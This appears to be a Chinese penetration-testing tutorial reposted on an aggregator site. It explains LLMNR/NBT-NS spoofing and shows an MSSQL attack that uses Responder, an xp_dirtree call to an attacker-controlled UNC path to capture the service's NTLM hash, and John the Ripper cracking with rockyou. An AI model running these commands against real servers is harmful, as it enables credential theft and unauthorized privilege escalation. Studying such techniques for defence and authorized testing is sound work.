日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击

發(fā)布時(shí)間:2024/3/26 编程问答 44 豆豆
生活随笔 收集整理的這篇文章主要介紹了 浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

LIMNR是什么?

鏈路本地多播名稱解析(LIMNR)是一個(gè)基于協(xié)議的域名系統(tǒng)(DNS)數(shù)據(jù)包的格式,使得雙方的IPv4和IPv6的主機(jī)來執(zhí)行名稱解析為同一本地鏈路上的主機(jī),當(dāng)局域網(wǎng)中的DNS服務(wù)器不可用時(shí),DNS客戶端會(huì)使用LIMNR本地鏈路多播名稱解析來解析本地的主機(jī)名稱

NetBIOS是什么?

Netbios(Network Basic Input Output System):網(wǎng)絡(luò)基本輸入輸出系統(tǒng),提供OSI模型中的會(huì)話層服務(wù),分享數(shù)據(jù),是一種應(yīng)用程序接口API同時(shí)系統(tǒng)可以利用WINS服務(wù)將NetBIOS名解析為相應(yīng)IP地址,局域網(wǎng)都是在NetBIOS協(xié)議的基礎(chǔ)上工作的

當(dāng)dns解析發(fā)送錯(cuò)誤時(shí),LLMNR(鏈路本地多播名稱解析)和NBT-NS會(huì)代替解析

????????監(jiān)聽LLMNR和NetBIOS協(xié)議的可以使用Metasploit或者Responder工具

Responder工具使用

? ? ? ? 下載地址:Responder下載

? ? ? ? Responder是監(jiān)聽LLMNR和NetBIOS協(xié)議的工具之一,能夠抓取網(wǎng)絡(luò)中的所有LLMNR和NetBIOS請求并進(jìn)行響應(yīng),獲取最初的賬戶憑證,可以利用內(nèi)置SMB,MSSQL,HTTP,DNS,POP3,FTP等服務(wù)器,收集目標(biāo)文件的憑證

responder -h

responder -I <網(wǎng)卡> -i <ip地址>

記錄一次mssql滲透

? ? ? ? 通過SMB得到mssql用戶并且進(jìn)行mssql數(shù)據(jù)庫登錄,執(zhí)行xp_cmdshell發(fā)現(xiàn)無權(quán)限開啟

? ? ? ? ?發(fā)現(xiàn)可以執(zhí)行擴(kuò)展存儲(chǔ)xq_dirtree

????????配合xp_dirtree存儲(chǔ)過程獲取運(yùn)行mssql服務(wù)的用戶NTLM的hash值,原理是通過LLMNR/NBT-NS欺騙攻擊,讓MSSQL去訪問我們偽造的服務(wù),當(dāng)MSSQL去執(zhí)行時(shí)就會(huì)把它自己的憑證發(fā)給我們,我們通過破解它的憑證在返回登錄MSSQL,得到最高權(quán)限具體操作

使用命令responder-I eth0?-i ip地址

回到mssqlclient.py的命令窗口中,執(zhí)行命令xp_dirtree "\\172.16.1.100\test" 然后回到Responder觀察監(jiān)聽信息?

?導(dǎo)入一個(gè)文件里面 使用jhon破解

jhon --wordlist=/usr/share/wordlists/rockyou.txt <文件名>

最后破解到密碼重新登錄mssql得到最高權(quán)限

總結(jié)

以上是生活随笔為你收集整理的浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。